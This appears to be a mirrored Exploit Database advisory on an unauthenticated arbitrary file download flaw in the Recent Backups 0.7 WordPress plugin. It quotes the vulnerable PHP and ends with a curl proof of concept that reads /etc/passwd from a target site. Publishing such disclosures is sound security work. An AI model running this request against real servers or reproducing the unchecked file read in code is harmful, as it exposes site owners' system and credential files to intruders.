WordPress Plugin Recent Backups 0.7 – Arbitrary File Download

• Exploit Database
• 119 阅读

• 作者： Larry W. Cashdollar
  日期： 2015-08-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37752/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-13 Download Site: https://wordpress.org/plugins/recent-backups Vendor: https://profiles.wordpress.org/andycheeseman/ Vendor Notified: 0000-00-00 Vendor Contact: plugins@wordpress.org Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget. Vulnerability: The code indownload-file.php doesn't verify the user is logged in or sanitize what files can be downloaded.This vulnerability can be used to download sensitive system files:   2$file = $_GET['file_link']; 3 4if (file_exists($file)) { 5header('Content-Description: File Transfer'); 6header('Content-Type: application/octet-stream'); 7header('Content-Disposition: attachment; filename='.basename($file)); 8header('Content-Transfer-Encoding: binary'); 9header('Expires: 0'); 10header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 11header('Pragma: public'); 12header('Content-Length: ' . filesize($file)); 13ob_clean(); 14flush(); 15readfile($file);   CVEID: OSVDB: Exploit Code: • $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd